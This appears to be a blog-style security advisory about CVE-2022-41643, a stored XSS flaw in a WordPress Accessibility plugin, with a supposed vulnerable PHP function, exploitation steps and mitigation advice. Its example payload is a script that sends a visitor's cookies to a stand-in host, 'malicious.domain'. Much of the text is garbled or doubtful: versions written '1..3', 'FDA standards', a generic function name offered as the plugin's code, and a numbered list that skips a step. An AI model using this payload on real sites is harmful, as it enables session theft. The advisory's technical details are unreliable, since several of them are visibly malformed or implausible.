CVE-2022-41643: Stored Cross-Site Scripting (XSS) Vulnerability in Accessibility Plugin <= 1..3 on WordPress for Administrator and Higher Privileges

The Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-41643 refers to a stored Cross-Site Scripting (XSS) vulnerability in the WordPress Accessibility plugin (version 1..3 and older). This vulnerability can enable an attacker to run malicious scripts on the affected website under the context of an administrator or a user with higher privileges. In this post, we will discuss details of this vulnerability, how it can be exploited, and the necessary steps to mitigate the risk posed by it.

Description of the vulnerability

Accessibility is a WordPress plugin designed to improve the accessibility of websites in conformance to the FDA standards. However, in versions 1..3 and older, there exists a stored XSS vulnerability that can allow malicious actors to inject malicious code into a website running this plugin. The attacker needs to be an authenticated user with administrator or higher privileges to exploit this vulnerability.

Source code snippet

The vulnerability is found in the plugin settings, particularly in the function responsible for updating the settings. Here is the code snippet with the vulnerable function:

function my_plugin_update_settings() {
    if (current_user_can( 'manage_options' )) {
        update_option( 'wp_accessibility_options', $_POST['options'] );
    }
}

This function updates the plugin settings based on the user input via the $_POST['options'] variable. Unfortunately, there is no input validation or sanitization of the data received, which means attackers can inject malicious JavaScript code that will be executed when an administrator or user with higher privileges accesses the affected page.

Exploitation details

To exploit this vulnerability, an attacker needs to craft a specially formulated payload containing the malicious JavaScript code. The attacker can then access the plugin's settings page and input the payload in one of the text fields, such as the custom CSS field.

Example of an XSS payload

<script>document.location='https://malicious.domain/log?cookie='+document.cookie;</script>;

After the attacker inputs this payload and saves the settings, the malicious code will be stored on the system. When an administrator or a user with higher privileges visits the affected page, their browser will execute the JavaScript code, potentially leading to stolen privileges, unauthorized actions, or disclosing sensitive information.

To protect your WordPress site from this vulnerability, take the following steps

1. Update the Accessibility plugin to the latest version. The vulnerable function has been fixed in version 1..4.

If you can't update the plugin, consider disabling it until a security patch is available.

3. Regularly backup your site and keep all themes and plugins up-to-date to minimize the risk of vulnerabilities.
4. Monitor user activities on your site and limit the number of users with administrator or higher privileges.

Conclusion

CVE-2022-41643 is a stored XSS vulnerability in the WordPress Accessibility plugin (version 1..3 and older) that can be exploited by an attacker with administrator or higher privileges. To prevent potential attacks and keep your WordPress site secure, it's crucial to keep all plugins and themes up-to-date, monitor user activities, and restrict access to users with higher privileges.

Original references

- CVE-2022-41643 - NIST National Vulnerability Database (NVD)
- WordPress Accessibility Plugin Vulnerability – Plugin Vulnerabilities

Timeline

Published on: 11/18/2022 23:15:00 UTC
Last modified on: 11/23/2022 17:46:00 UTC